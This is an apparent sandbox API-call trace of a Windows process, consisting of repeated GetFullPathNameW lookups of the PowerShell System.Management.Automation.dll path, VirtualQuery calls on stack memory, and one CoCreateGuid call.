	[0287.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12baa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.578] VirtualQuery (in: lpAddress=0x12b390, lpBuffer=0x12c250, dwLength=0x30 | out: lpBuffer=0x12c250*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.578] VirtualQuery (in: lpAddress=0x12b420, lpBuffer=0x12c2e0, dwLength=0x30 | out: lpBuffer=0x12c2e0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bb50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12baa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12baa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12be60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12be60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.580] VirtualQuery (in: lpAddress=0x12b390, lpBuffer=0x12c250, dwLength=0x30 | out: lpBuffer=0x12c250*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.580] VirtualQuery (in: lpAddress=0x12b420, lpBuffer=0x12c2e0, dwLength=0x30 | out: lpBuffer=0x12c2e0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bb50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12baa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12baa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.581] VirtualQuery (in: lpAddress=0x12b390, lpBuffer=0x12c250, dwLength=0x30 | out: lpBuffer=0x12c250*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.581] VirtualQuery (in: lpAddress=0x12b420, lpBuffer=0x12c2e0, dwLength=0x30 | out: lpBuffer=0x12c2e0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12be60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12be60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12be60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12be60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12be60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12be60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.583] VirtualQuery (in: lpAddress=0x12b390, lpBuffer=0x12c250, dwLength=0x30 | out: lpBuffer=0x12c250*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.583] VirtualQuery (in: lpAddress=0x12b420, lpBuffer=0x12c2e0, dwLength=0x30 | out: lpBuffer=0x12c2e0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bb50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12baa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12baa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.584] VirtualQuery (in: lpAddress=0x12b390, lpBuffer=0x12c250, dwLength=0x30 | out: lpBuffer=0x12c250*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.584] VirtualQuery (in: lpAddress=0x12b420, lpBuffer=0x12c2e0, dwLength=0x30 | out: lpBuffer=0x12c2e0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bb50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12baa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12baa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.586] VirtualQuery (in: lpAddress=0x12bc90, lpBuffer=0x12cb50, dwLength=0x30 | out: lpBuffer=0x12cb50*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.586] VirtualQuery (in: lpAddress=0x12bd20, lpBuffer=0x12cbe0, dwLength=0x30 | out: lpBuffer=0x12cbe0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.587] VirtualQuery (in: lpAddress=0x12bc90, lpBuffer=0x12cb50, dwLength=0x30 | out: lpBuffer=0x12cb50*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.587] VirtualQuery (in: lpAddress=0x12bd20, lpBuffer=0x12cbe0, dwLength=0x30 | out: lpBuffer=0x12cbe0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.587] VirtualQuery (in: lpAddress=0x12bd20, lpBuffer=0x12cbe0, dwLength=0x30 | out: lpBuffer=0x12cbe0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.587] VirtualQuery (in: lpAddress=0x12bc90, lpBuffer=0x12cb50, dwLength=0x30 | out: lpBuffer=0x12cb50*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.587] VirtualQuery (in: lpAddress=0x12bd20, lpBuffer=0x12cbe0, dwLength=0x30 | out: lpBuffer=0x12cbe0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.587] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x67f905b5, Data2=0x3bdf, Data3=0x46f3, Data4=([0]=0xac, [1]=0x1a, [2]=0x60, [3]=0xfc, [4]=0xca, [5]=0xc4, [6]=0x90, [7]=0x99))) returned 0x0
	[0287.588] VirtualQuery (in: lpAddress=0x12bca0, lpBuffer=0x12cb60, dwLength=0x30 | out: lpBuffer=0x12cb60*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.588] VirtualQuery (in: lpAddress=0x12bca0, lpBuffer=0x12cb60, dwLength=0x30 | out: lpBuffer=0x12cb60*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.588] VirtualQuery (in: lpAddress=0x12bd30, lpBuffer=0x12cbf0, dwLength=0x30 | out: lpBuffer=0x12cbf0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.589] VirtualQuery (in: lpAddress=0x12bca0, lpBuffer=0x12cb60, dwLength=0x30 | out: lpBuffer=0x12cb60*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.589] VirtualQuery (in: lpAddress=0x12bd30, lpBuffer=0x12cbf0, dwLength=0x30 | out: lpBuffer=0x12cbf0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.590] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.590] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.590] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.590] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.590] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.590] VirtualQuery (in: lpAddress=0x12bca0, lpBuffer=0x12cb60, dwLength=0x30 | out: lpBuffer=0x12cb60*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.591] VirtualQuery (in: lpAddress=0x12bd30, lpBuffer=0x12cbf0, dwLength=0x30 | out: lpBuffer=0x12cbf0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.591] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.260] VirtualQuery (in: lpAddress=0x12bca0, lpBuffer=0x12cb60, dwLength=0x30 | out: lpBuffer=0x12cb60*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0288.261] VirtualQuery (in: lpAddress=0x12bd30, lpBuffer=0x12cbf0, dwLength=0x30 | out: lpBuffer=0x12cbf0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0288.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
